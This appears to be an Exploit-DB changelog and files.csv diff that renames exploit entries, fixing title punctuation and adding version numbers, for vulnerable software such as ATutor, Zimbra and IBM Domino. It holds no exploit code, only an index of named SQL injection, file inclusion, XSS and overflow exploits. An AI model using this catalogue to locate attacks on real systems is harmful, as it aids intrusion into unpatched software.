DB: 2016-10-25

4 new exploits

ATutor 1.5.3.1 - (links) Blind SQL Injection
ATutor 1.5.3.1 - 'links' Blind SQL Injection

Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure
Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure

IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow
IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow

WebPortal CMS 0.6.0 - (index.php m) SQL Injection
WebPortal CMS 0.6.0 - 'index.php' SQL Injection

samPHPweb - 'db.php commonpath' Remote File Inclusion
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion

samPHPweb - 'songinfo.php' SQL Injection
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection

ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion
ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion

The Matt Wright Guestbook.pl 2.3.1 - Server Side Include
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include

html2ps - 'include file' Server Side Include Directive Directory Traversal
html2ps - 'include file' Server-Side Include Directive Directory Traversal

ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion
ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion

Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting
Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting

Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion
Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion

Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting
Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting
ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting
ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting
ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting
ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting
ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting
ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting
ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting
ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting
ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting
ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting
ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting
ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting
ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting
ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting
ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting
ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting
ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting
ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting

Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion
Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion

Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit)
Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)

Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion
Weathermap 0.97c - 'mapname' Parameter Local File Inclusion

ATutor 1.5.1 - password_reminder.php SQL Injection
ATutor 1.5.1 - 'password_reminder.php' SQL Injection
ATutor 1.x - forum.inc.php Arbitrary Command Execution
ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion
ATutor 1.x - print.php section Parameter Remote File Inclusion
ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution
ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion
ATutor 1.x - 'print.php' section Parameter Remote File Inclusion
ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting
ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting
ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting
ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting
ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting
ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting
ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting
ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting

Zimbra - Privilegie Escalation (via Local File Inclusion)
Zimbra 2009-2013 - Local File Inclusion

Zimbra Collaboration Server - Local File Inclusion (Metasploit)
Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)

Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion
Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion

Cart Engine 3.0.0 - (task.php) Local File Inclusion
Cart Engine 3.0.0 - 'task.php' Local File Inclusion

Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion
Kemana Directory 1.5.6 - 'task.php' Local File Inclusion

Railo - Remote File Inclusion (Metasploit)
Railo 4.2.1 - Remote File Inclusion (Metasploit)

LittleSite 0.1 - 'file' Parameter Local File Inclusion
LittleSite 0.1 - 'index.php' Local File Inclusion

OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion
OSClass 3.4.1 - 'index.php' Local File Inclusion

Magento Server MAGMI Plugin - Remote File Inclusion
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion

Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection)
Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion

Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)
Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)

u5CMS 3.9.3 - (thumb.php) Local File Inclusion
u5CMS 3.9.3 - 'thumb.php' Local File Inclusion
openSIS - 'modname' Parameter Local File Inclusion
ATutor - 'tool_file' Parameter Local File Inclusion
openSIS 5.1 - 'ajax.php' Local File Inclusion
ATutor 2.1 - 'tool_file' Parameter Local File Inclusion

Fork CMS - 'file' Parameter Local File Inclusion
Fork CMS - 'js.php' Local File Inclusion

HP Insight Diagnostics - Local File Inclusion
HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion

phpVibe - Information Disclosure / Remote File Inclusion
phpVibe 3.1 - Information Disclosure / Remote File Inclusion

CakePHP - AssetDispatcher Class Local File Inclusion
CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion

TomatoCart - 'install/rpc.php' Local File Inclusion
TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion

NeoBill - /install/index.php language Parameter Traversal Local File Inclusion
NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion
iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion
iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion
iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion
iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion
iScripts AutoHoster - 'fname' Parameter Local File Inclusion
iScripts AutoHoster - 'id' Parameter Local File Inclusion
AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion
AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion
AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion
AFCommerce - 'adblock.php' Remote File Inclusion
AFCommerce - 'adminpassword.php' Remote File Inclusion
AFCommerce - 'controlheader.php' Remote File Inclusion

xBoard - 'post' Parameter Local File Inclusion
xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion

BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion
BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion

Rips Scanner 0.5 - (code.php) Local File Inclusion
Rips Scanner 0.5 - 'code.php' Local File Inclusion

MeiuPic - 'ctl' Parameter Local File Inclusion
MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion

qEngine - 'run' Parameter Local File Inclusion
qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion

WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion
WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion
Alfresco - /proxy endpoint Parameter Server Side Request Forgery
Alfresco - /cmisbrowser url Parameter Server Side Request Forgery
Alfresco - /proxy endpoint Parameter Server-Side Request Forgery
Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery

CMSimple - Remote file Inclusion
CMSimple 4.4.4 - Remote file Inclusion

VoipSwitch - 'action' Parameter Local File Inclusion
VoipSwitch - 'user.php' Local File Inclusion

Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion
Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion

Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String
Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String

vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery
vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery
Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery
Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)
EC-CUBE 2.12.6 - Server-Side Request Forgery
Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management

files.csv

@@ -1789,7 +1789,7 @@ id,file,description,date,author,platform,type,port
 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0
 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0
 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0
-2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Blind SQL Injection",2006-07-30,rgod,php,webapps,0
+2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0
 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0
 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0
 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0
@@ -4461,13 +4461,13 @@ id,file,description,date,author,platform,type,port
 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0
 4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0
 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
-4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
+4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
 4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0
 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0
 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0
 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0
 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0
-4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
+4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
 4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0
 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0
@@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port
 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0
 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0
 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0
-4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection",2007-12-31,x0kster,php,webapps,0
+4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0
 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0
 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0
 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0
@@ -4483,9 +4483,9 @@ id,file,description,date,author,platform,type,port
 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0
 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0
 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote / Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0
-4834,platforms/php/webapps/4834.txt,"samPHPweb - 'db.php commonpath' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0
+4834,platforms/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0
 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0
-4836,platforms/php/webapps/4836.txt,"samPHPweb - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0
+4836,platforms/php/webapps/4836.txt,"samPHPweb 4.2.2 - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0
 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0
 4838,platforms/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0
 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0
@@ -5773,7 +5773,7 @@ id,file,description,date,author,platform,type,port
 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0
 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0
-6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0
+6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0
 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0
 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0
 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0
@@ -9294,7 +9294,7 @@ id,file,description,date,author,platform,type,port
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
-9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0
+9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0
 9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0
 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0
@@ -9389,7 +9389,7 @@ id,file,description,date,author,platform,type,port
 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
-10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0
+10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0
 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0
 10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
@@ -19472,7 +19472,7 @@ id,file,description,date,author,platform,type,port
 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0
 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0
 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0
-22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0
+22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0
 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0
 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0
 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
@@ -21539,7 +21539,7 @@ id,file,description,date,author,platform,type,port
 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0
 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0
-24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
+24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0
 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0
 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0
@@ -22069,7 +22069,7 @@ id,file,description,date,author,platform,type,port
 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0
 24868,platforms/php/webapps/24868.rb,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0
 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
-24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0
+24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,php,webapps,0
 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
@@ -22108,7 +22108,7 @@ id,file,description,date,author,platform,type,port
 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos,0
 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0
 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p Parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0
-24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0
+24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0
 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0
 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0
 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0
@@ -23019,15 +23019,15 @@ id,file,description,date,author,platform,type,port
 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0
 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0
 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0
-25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0
 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0
 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0
@@ -23167,7 +23167,7 @@ id,file,description,date,author,platform,type,port
 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
 25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
-25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
+25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0
 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
 25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0
